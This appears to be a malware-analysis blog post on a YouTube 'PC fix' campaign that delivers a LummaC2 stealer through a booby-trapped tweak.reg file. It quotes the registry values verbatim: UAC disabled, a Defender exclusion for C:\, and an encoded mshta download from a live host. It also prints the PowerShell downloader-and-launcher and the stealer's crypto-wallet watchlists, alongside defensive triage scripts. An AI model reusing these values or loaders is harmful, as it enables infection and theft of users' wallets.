Ongoing series: #1 #2 #3 #4 #5 #6
yet another youtube pc help update
After several domains related to the campaign from the article youtube pc help #2 were blocked by registrars and some YouTube videos were set to private, there was another pause in the campaign. However, a new series of videos was then uploaded with a new link to another hosted file with a new payload. Time for another analysis:
The Video(s)
One of the previously identified channels published multiple new videos linking to the new campaign, and three further channels followed with the same link:
| YouTube Link | Upload | Link in Description | Channel |
|-----------------------------------|------------|---------------------------------|---------------|
| youtube[.]com/watch?v=69yzkjnRCs8 | 2024-07-22 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=NkCXb34TK5U | 2024-07-22 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=i3nIxACbLvg | 2024-07-22 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=nraJJ-uXmaQ | 2024-07-22 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=ncHgjnKlN7M | 2024-07-23 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=vZ_v1RRFlEY | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=sBZNlaA7no8 | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=9oeVLXCallE | 2024-07-24 | https://tinyurl[.]com/tweakfix | @Skoota18 |
| youtube[.]com/watch?v=7ge7ivXmbQw | 2024-07-24 | https://tinyurl[.]com/tweakfix | @Skoota18 |
| youtube[.]com/watch?v=MIYoCrTrUk8 | 2024-07-24 | https://tinyurl[.]com/tweakfix | @Skoota18 |
| youtube[.]com/watch?v=N3hmcKO_AFU | 2024-07-24 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=22T0XJqH3q4 | 2024-07-24 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=9UVK9R40KoQ | 2024-07-24 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=U3ozXujTm_c | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jaydizzle847 |
| youtube[.]com/watch?v=yTZS8h8pPoE | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jaydizzle847 |
| youtube[.]com/watch?v=dfJzR4evcBw | 2024-07-24 | https://tinyurl[.]com/tweakfix | @jaydizzle847 |
| youtube[.]com/watch?v=v-QVon6RNAM | 2024-07-25 | https://tinyurl[.]com/tweakfix | @jappaband |
| youtube[.]com/watch?v=iAjtq4EZ2XY | 2024-07-25 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=R4f4Qz5gdCU | 2024-07-25 | https://tinyurl[.]com/tweakfix | @imevil924 |
| youtube[.]com/watch?v=g1sZDBEj4ZI | 2024-07-25 | https://cli[.]re/3D4Mz3 | @Skoota18 |
| youtube[.]com/watch?v=tmJTNrgSmGQ | 2024-07-25 | https://cli[.]re/3D4Mz3 | @jaydizzle847 |
| youtube[.]com/watch?v=QugS0AYkCvs | 2024-07-29 | https://dropmefiles[.]com/JUSvP | @jappaband |
| youtube[.]com/watch?v=C1A2aVk6Ufg | 2024-07-29 | https://dropmefiles[.]com/JUSvP | @jappaband |
| youtube[.]com/watch?v=AzMQ5cjZ03I | 2024-07-29 | https://dropmefiles[.]com/JUSvP | @jappaband |
| youtube[.]com/watch?v=9idZvNpXzhU | 2024-07-29 | https://dropmefiles[.]com/JUSvP | @jappaband |
In this new iteration of videos, additional issues were targeted to reach a broader audience. Besides the known search terms 0x80070643 and KB5034441, new videos also allegedly address issues related to MSVCP140.dll, vcruntime140.dll, and error code 0xc00007b.
The Download Site(s)
Presumably to make detection and reporting more difficult, the delivery of the first stage was changed. The link from the shortener redirects the user to geeksupp[.]com, which evaluates the source IP and the User-Agent of the request and serves one of two responses:
Option 1: The harmless, fake website of the supposed GeekSupp is loaded, clearly a generated site for a purported legitimate service provider. Requests that fail either test, for example from a cloud or VPN range or with a command-line User-Agent, get this decoy, so simply fetching the link from an analysis box will usually not reproduce the infection chain.
Option 2: If the request carries a "normal" browser User-Agent and comes from a residential IP range, the user is redirected straight to a file hosted on a file storage and sharing service.
| File Sharing Link | File Created |
|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------|
| https://www.mediafire[.]com/file/gagjlct7gmk4k3b/Tweaks.zip/file | 2024-07-22 |
| https://www.dropbox[.]com/scl/fi/dg21d2z1g0x8nqb2oyw6m/TweakS.zip?rlkey=i5wragdhhm3urod1mkqw07sxv&st=yjdwd53p&dl=1 | 2024-07-25 |
| https://www.dropbox[.]com/scl/fi/rw0znswxekdyoi3tm3yhm/tweak.reg?rlkey=oirtnf7k8vfnf3vxoxjb6vdw8&st=cv3svwr8&dl=1 | 2024-07-25 |
| https://pixeldrain[.]com/api/file/4VYReuMg?download= | 2024-07-29 |
| https://dropmefiles[.]com/JUSvP | 2024-07-29 |
| https://cdn.discordapp[.]com/attachments/1267531349279903867/1267531429827579964/tweak.reg?ex=66a92022&is=66a7cea2&hm=60deb5b149279c25816408c8efc340134b599cbca54a550903aef70b7f63051a&= | 2024-07-29 |
The Code (Stage 1)
The file available for download is a zip archive. It contains several files, including some legitimate DLLs and the tweak.reg (SHA256:8FD1045F156BE3A3D226C04D7E140D3AAF115A31ABBE36A9EB194A63521BA46C) mentioned in the video. This is, as before, a registry file bloated with junk entries, but it now sets three values that matter:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SchedulerMaster"="pOWerShElL -eP ByPASs -WiNdOwSTYlE HiDDen -CoMMAnd \"& {Add-MpPreference -ExclusionPath 'C:\\'; }\""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"ZASUSU"="pOwERSheLl -eNc LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwB0ADIAcgBsAC4AcAB3AGEAcgB0AGkAYwBsAGUAcwAuAHAAcgBvAC8AdwBlAGIAZABhAHYALwBqAHIAZQBnAC8AQwBPAE4AVAA="
The first value sets EnableLUA to 0, i.e. false. LUA (Limited User Account) is the old name for UAC (User Account Control), so this disables UAC: once the machine has been rebooted, processes of an administrator account run with a full token and privileged actions no longer prompt the user. Writing under HKEY_LOCAL_MACHINE needs administrative rights, which the victim grants when approving the elevation prompt that regedit shows on importing the .reg file.
The second value is a RunOnce entry that calls the Add-MpPreference cmdlet to add the entire C:\ drive as a Defender exclusion, so nothing stored on the (default) system drive will be scanned. HKCU RunOnce entries execute at the next logon; with UAC disabled, the cmdlet, which itself requires administrative rights, runs without any prompt.
Lastly, a second RunOnce entry carries a Base64-encoded command (Base64 over UTF-16LE, as PowerShell's -EncodedCommand expects). It decodes to .'mshta'https://t2rl.pwarticles[.]pro/webdav/jreg/CONT, i.e. mshta is used to download and execute the next stage (SHA256:C8647F3FDF48A33F8F8F7F47D2CC875996569DD49F94ED804C78CA8DB477C23C).
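The registry file can be triaged without ever importing it. The following Python script is an added example (editor's code, not from the campaign or the original post): it parses the .reg text, flags the EnableLUA and autorun values, and decodes the -EncodedCommand payload, which is Base64 over UTF-16LE rather than UTF-8. The sample text is a constructed excerpt containing the three values above plus one junk key; the real file is padded with far more filler. Function names and the finding categories are the editor's own.

```python
import base64
import re

# Constructed excerpt of tweak.reg: the three values come from the analysis above,
# the junk key stands in for the filler the real file is padded with.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\.junk]
"Filler"="nothing to see here"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SchedulerMaster"="pOWerShElL -eP ByPASs -WiNdOwSTYlE HiDDen -CoMMAnd \"& {Add-MpPreference -ExclusionPath 'C:\\'; }\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"ZASUSU"="pOwERSheLl -eNc LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwB0ADIAcgBsAC4AcAB3AGEAcgB0AGkAYwBsAGUAcwAuAHAAcgBvAC8AdwBlAGIAZABhAHYALwBqAHIAZQBnAC8AQwBPAE4AVAA="
'''

AUTORUN_KEY = re.compile(r'\\CurrentVersion\\Run(Once)?$', re.I)
# -e / -ec / -enc / -EncodedCommand followed by the Base64 blob. The optional suffix
# is consumed before the whitespace so that "-eP ByPASs" does not match.
ENCODED_ARG = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})', re.I)


def parse_reg(text):
    """Yield (key, value_name, raw_data) for every value in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
        elif line.startswith('"') and key is not None:
            name, _, data = line.partition('=')
            yield key, name.strip('"'), data


def unescape(data):
    # .reg escapes backslash and double quote with a backslash; undo that for REG_SZ data.
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        return re.sub(r'\\(["\\])', r'\1', data[1:-1])
    return data


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    # PowerShell expects Base64 of the UTF-16LE command text, not UTF-8.
    return base64.b64decode(m.group(1)).decode('utf-16-le')


def triage_reg(text):
    """Return (kind, key, name, value) tuples for settings worth an analyst's attention."""
    findings = []
    for key, name, data in parse_reg(text):
        value = unescape(data)
        if name.lower() == 'enablelua' and value.lower() == 'dword:00000000':
            findings.append(('uac_disabled', key, name, value))
        if AUTORUN_KEY.search(key) and re.search(r'powershell', value, re.I):
            kind = 'autorun_powershell'
            if re.search(r'add-mppreference', value, re.I):
                kind = 'autorun_defender_exclusion'
            decoded = decode_encoded_command(value)
            if decoded is not None:
                kind = 'autorun_encoded_command'
                value = decoded  # report the decoded command, not the blob
            findings.append((kind, key, name, value))
    return findings


if __name__ == '__main__':
    for finding in triage_reg(SAMPLE_REG):
        print(*finding, sep=' | ')
```

Running it on the constructed excerpt yields three findings, the last of them already decoded, so the mshta URL can be defanged and submitted for takedown without touching the original blob.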
The Not-So-Executable (Stage 2)
As previously described in youtube pc help #2, the downloaded file is an executable, but the relevant part is encoded and hidden within it as a JavaScript script. Similar to before, several layers of deobfuscation and decoding are necessary to reach the actually interesting layer. For example, one layer stores the JavaScript code as an array of numbers, and each element is converted back to a character after subtracting 427:
function vMP(dSV){                                   // dSV: array of shifted code points
    var eZn = "";
    for (var Wjj = 0; Wjj < dSV.length; Wjj++) {
        var Kry = String.fromCharCode(dSV[Wjj] - 427); // undo the constant +427 shift
        eZn = eZn + Kry;
    }
    return eZn;                                      // the decoded script text
};
After several more layers of obfuscation, the decrypted PowerShell script can be analyzed. It contains five functions, with the top-level call invoking CGl.
function CGl(){
$VVh = $env:AppData + '\';
Start-Sleep -Seconds 8;
$wFTlOkINiDNN = $VVh + 'giupload.zip';
if (Test-Path -Path $wFTlOkINiDNN){
XRu $wFTlOkINiDNN;
}
Else{
$naNPme = DCI (rVh @(5228,5240,5240,5236,5239,5182,5171,5171,5240,5174,5238,5232,5170,5236,5243,5221,5238,5240,5229,5223,5232,5225,5239,5170,5236,5238,5235,5171,5243,5225,5222,5224,5221,5242,5171,5230,5238,5225,5227,5171,5227,5229,5241,5236,5232,5235,5221,5224,5170,5246,5229,5236));
DwV $wFTlOkINiDNN $naNPme;
XRu $wFTlOkINiDNN
};
}
This function checks whether a file named giupload.zip (SHA256:5AEED0DAA0D8EC420C31282257C7CB8286EB5A150D53B60C7698949923C557BE) is already present in AppData. If not, the download URL, obfuscated as an array of code points, is first decoded by rVh (each element minus a constant offset, here 5124, which yields https://t2rl.pwarticles[.]pro/webdav/jreg/giupload.zip, the same host as the Stage 1 URL) and passed to the downloader DCI. Its result is written to the giupload.zip path by DwV, and XRu is then called with that path as a parameter.
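Both the JavaScript layer (offset 427) and the rVh helper in the PowerShell layer use the same trivial scheme: every code point is stored plus a constant. The Python below is an added example (editor's code, not from the sample) that recovers such a string without knowing the offset, either from a known-plaintext prefix or by brute force over the offsets that keep the output printable, ranked by how URL-like the result is. The array is the one passed to rVh above; the offset it recovers, 5124, and the resulting URL follow from the page's own numbers. The scoring alphabet and function names are the editor's choices.

```python
import string

# Code-point array passed to rVh in the CGl function above (copied from the sample).
RVH_ARRAY = [5228,5240,5240,5236,5239,5182,5171,5171,5240,5174,5238,5232,5170,5236,5243,
             5221,5238,5240,5229,5223,5232,5225,5239,5170,5236,5238,5235,5171,5243,5225,
             5222,5224,5221,5242,5171,5230,5238,5225,5227,5171,5227,5229,5241,5236,5232,
             5235,5221,5224,5170,5246,5229,5236]

# Characters expected in a URL or file path; used to rank brute-force candidates.
URLISH = set(string.ascii_letters + string.digits + ':/.-_')


def shift_decode(codes, shift):
    """Inverse of the obfuscation: subtract the constant from every code point."""
    return ''.join(chr(c - shift) for c in codes)


def shift_from_prefix(codes, known_prefix):
    """Known-plaintext: a constant shift is fixed by one character; verify the rest."""
    shift = codes[0] - ord(known_prefix[0])
    if shift_decode(codes[:len(known_prefix)], shift) != known_prefix:
        raise ValueError('the array does not start with that prefix under any constant shift')
    return shift


def printable_shifts(codes):
    """All offsets for which every decoded character is printable ASCII (0x20..0x7E)."""
    lo, hi = max(codes) - 0x7E, min(codes) - 0x20
    return [s for s in range(lo, hi + 1)
            if all(0x20 <= c - s <= 0x7E for c in codes)]


def best_shift(codes):
    """Brute force: among printable offsets, pick the one yielding the most URL-like text."""
    candidates = printable_shifts(codes)
    if not candidates:
        raise ValueError('no constant shift yields printable ASCII')
    return max(candidates,
               key=lambda s: sum(ch in URLISH for ch in shift_decode(codes, s)))


if __name__ == '__main__':
    shift = best_shift(RVH_ARRAY)
    print(shift, shift_decode(RVH_ARRAY, shift))
```

Printability alone leaves 19 candidate offsets for this array, which is why the ranking step matters: only the true offset turns every letter back into a letter, while neighbouring offsets push a or z into punctuation.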
function XRu($NCh){
$AumUS = $env:AppData;
Expand-Archive -Path $NCh -DestinationPath $AumUS;
Add-Type -Assembly System.IO.Compression.FileSystem;
$zipFile = [IO.Compression.ZipFile]::OpenRead($NCh);
$IFpY =($zipFile.Entries | Sort-Object Name | Select-Object -First 1).Name;
$Dffhq = Join-Path $AumUS $IFpY;
start $Dffhq ;
};
The XRu function extracts the downloaded archive into AppData and then starts the alphabetically first entry of the archive, so the attacker controls which file runs simply by its name.
The Semi-Final Payload (Stage 3)
This executable file is giupload.exe (SHA256: 7C9C5DEE8DFCDC5BD57F366598E5F4CD08014FF38FD2A835C22B67065400AC47), originally named NFOPad.exe and carrying an invalid certificate from German Gorodokuplya. It is a payload associated with the LummaC2 Stealer, which downloads and executes several additional files, executables, and C2 configuration files.
A Final-Final Payload (Stage 4)
One of these additional files is attacker, another PowerShell script. Besides several sandbox and AV evasion functions, it has one core task, driven by two watchlists:
$TaRgeTFoLdeRs = @(
"Ledger Live",
"BitBox",
"@trezor",
"Roaming\Exodus",
"Local\Coinomi\Coinomi",
"Roaming\Atomic",
"Roaming\Guarda"
)
$CHrOmEExtEnSiOns = @(
"nkbihfbeogaeaoehlefnkodbefgpgknn",
"ibnejdfjmmkpcnlpebklmnkoeoihofec",
"egjidjbpglichdcondbcbdnbeeppgdph"
)
The main goal of this script is to read the Chrome user profiles and search for the folder structures and Chrome extension IDs listed above, which indicate installed crypto wallets (the three extension IDs belong to MetaMask, TronLink and Trust Wallet). If such a wallet is found, another executable, AacAmbientLighting.exe (SHA256: 5BF36CC6314E62EDCAB7A0EFCBDE3E014540ED8C72B8F53F1B2DCA44AF7417B1), is downloaded and executed.
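The check the attacker script performs can be turned around into a quick host-side audit of the same indicators. The Python below is an added example (editor's code, not the attacker script): it walks a Chrome User Data directory for the extension IDs and the AppData tree for the wallet folders listed above. Chrome stores each installed extension under <profile>/Extensions/<id>/<version>/manifest.json, which is what the enumeration relies on. The directory tree it runs on is constructed in a temporary folder, the extension names are the editor's identification of the IDs, and since the page does not show how the real script compares folder names, looking bare names up under both Roaming and Local is an assumption.

```python
import tempfile
from pathlib import Path

# Watchlists copied from the attacker script above. The extension names are the
# editor's identification of the IDs, not something the page states.
WALLET_FOLDERS = ["Ledger Live", "BitBox", "@trezor", "Roaming\\Exodus",
                  "Local\\Coinomi\\Coinomi", "Roaming\\Atomic", "Roaming\\Guarda"]
WALLET_EXTENSIONS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",
    "ibnejdfjmmkpcnlpebklmnkoeoihofec": "TronLink",
    "egjidjbpglichdcondbcbdnbeeppgdph": "Trust Wallet",
}


def installed_extensions(user_data_dir):
    """Map extension ID -> profiles it is installed in.

    Chrome keeps unpacked extensions at <User Data>/<profile>/Extensions/<id>/<version>/,
    so an ID with at least one version directory holding a manifest.json is installed.
    """
    found = {}
    for profile in sorted(Path(user_data_dir).iterdir()):
        ext_root = profile / "Extensions"
        if not ext_root.is_dir():          # skips files such as "Local State"
            continue
        for ext_dir in ext_root.iterdir():
            versions = [v for v in ext_dir.iterdir() if v.is_dir()] if ext_dir.is_dir() else []
            if any((v / "manifest.json").is_file() for v in versions):
                found.setdefault(ext_dir.name, []).append(profile.name)
    return found


def wallet_indicators(appdata_dir, user_data_dir):
    """Return sorted indicator strings the Stage 4 script would trigger on."""
    appdata = Path(appdata_dir)
    hits = []
    for entry in WALLET_FOLDERS:
        parts = entry.split("\\")
        if len(parts) == 1:
            # Assumption: bare names are looked for under both Roaming and Local.
            candidates = [appdata / "Roaming" / entry, appdata / "Local" / entry]
        else:
            candidates = [appdata.joinpath(*parts)]
        if any(c.is_dir() for c in candidates):
            hits.append(f"folder:{entry}")
    for ext_id, profiles in installed_extensions(user_data_dir).items():
        if ext_id in WALLET_EXTENSIONS:
            hits.append(f"extension:{WALLET_EXTENSIONS[ext_id]}:{ext_id}:{','.join(profiles)}")
    return sorted(hits)


def build_fixture(root):
    """Constructed stand-in for C:\\Users\\<user>\\AppData with one wallet extension and one wallet folder."""
    appdata = Path(root) / "AppData"
    user_data = appdata / "Local" / "Google" / "Chrome" / "User Data"
    metamask = user_data / "Default" / "Extensions" / "nkbihfbeogaeaoehlefnkodbefgpgknn" / "11.16.0_0"
    metamask.mkdir(parents=True)
    (metamask / "manifest.json").write_text("{}")
    benign = user_data / "Profile 1" / "Extensions" / "zzzzconstructedbenignidzzzzzzzzz" / "1.0_0"
    benign.mkdir(parents=True)
    (benign / "manifest.json").write_text("{}")
    (user_data / "Local State").write_text("{}")            # a file next to the profiles
    (appdata / "Roaming" / "Exodus").mkdir(parents=True)
    (appdata / "Roaming" / "Microsoft").mkdir(parents=True)  # unrelated folder
    return appdata, user_data


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        appdata, user_data = build_fixture(tmp)
        return wallet_indicators(appdata, user_data)


if __name__ == "__main__":
    print(demo())
```

On a real host, point wallet_indicators at %USERPROFILE%\AppData and %LOCALAPPDATA%\Google\Chrome\User Data; any hit is a profile this campaign would have escalated to the AacAmbientLighting.exe stage.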